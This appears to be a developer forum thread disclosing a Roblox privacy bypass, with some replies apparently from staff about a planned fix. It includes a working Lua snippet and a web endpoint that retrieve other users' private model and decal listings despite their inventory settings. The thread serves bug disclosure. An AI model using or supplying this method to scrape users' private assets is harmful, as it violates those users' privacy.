This code snippet is an example of InsertService bypassing user privacy settings to return asset Ids and information:
local userid = 123
function dump(o) -- Makes table
if type(o) == 'table' then
local s = '{ '
for k,v in pairs(o) do
if type(k) ~= 'number' then k = '"'..k..'"' end
s = s .. '['..k..'] = ' .. dump(v) .. ','
end
return s .. '} \n'
else
return tostring(o)
end
end
local sets = game.InsertService:GetUserSets(userid)
print(dump(game.InsertService:GetCollection(sets[1].CategoryId))) -- sets[1] = models, sets[2] = decals
Loading a private asset into studio thankfully doesn’t work, however the api will still retrieve “private” information.
This is allowing users to create discord scrape bots, websites, etc., leaking personal assets as they’re uploaded. The only alternative currently to avoid leaking is to upload assets to an alternate account. I imagine this is a known issue, but I’ve received a large influx of messages/reports about this recently.
I’ve seen reports of this method working for uploaded decals, models and meshes*. This code snippet is capable of retrieving these categories for any user despite inventory settings
*edit: unsure if this exact method is being used for meshes, but I have been sent lists of scraped meshes from my inventory
It seems that this can also be used by a web API endpoint, specifically https://www.roblox.com/Game/Tools/InsertAsset.ashx?sid=SETID
The negative set numbers work with this, so if you get someone’s private setID via studio (the API endpoint for that seems to have been closed previously) then you can always use the above endpoint to see their latest assets.
Currently in the product we don’t really have a notion of asset privacy. The account setting which makes your inventory private is really misleading. The good news is we are working on implementing this in a proper sort of way where even if someone guesses an assetId they won’t be able to use it without authorization. Once that goes live, issues like will be moot.
I hope this doesn’t apply to existing assets (atleast existing decals and solidmodels), because if it does it may break old games which rely on the use of offsale assets created by other people.
Quick question that comes to mind on the other end of this: will assets (old and new) from users with public inventories continue to be usable after this update as they are now? I would’ve assumed that this new implementation would be just for users with private inventories, but just to confirm?
Please note that even if a user has their inventory marked as public, that does not mean you have the right to use their assets. The TOS clearly mentions a user has to denote whether their asset is free for public use.
To use an asset legitimately and you are not the owner of that asset, the asset has to be marked as Free. You cannot use Decals/Audio/etc by other users if they are not marked as Free. When the feature Seranok mentions above is implemented, it will likely prevent you from using non-Free assets that are publicly visible on the site, but that’s fine since you are not meant to be using these anyway.
Just testing and confirming here - this only works with models and decals, so other types of assets you’ve uploaded with a private inventory should be fine (e.g. audio). In this manner, it’s not a complete bypass, just for two categories of your inventory.
Your models and decals are counted as user sets (I’m not sure why this is the case and it doesn’t really matter either). All other sets that may appear in this list are actually from a very old feature that was sunset 3 years ago, sets. Check Sunsetting Sets for details. Found out by dumping my own inventory and finding sets that I subscribed to at least 6 years back or more.
Just for anyone concerned that this can be used to dump other assets. This method can only fetch models and decals as well as sets you’ve created or subscribed to when the Sets feature existed.
It appears that for users created after Sunsetting Sets you will get a LuaWebService error when you try to dump the set (this comes from the GetCollection call).
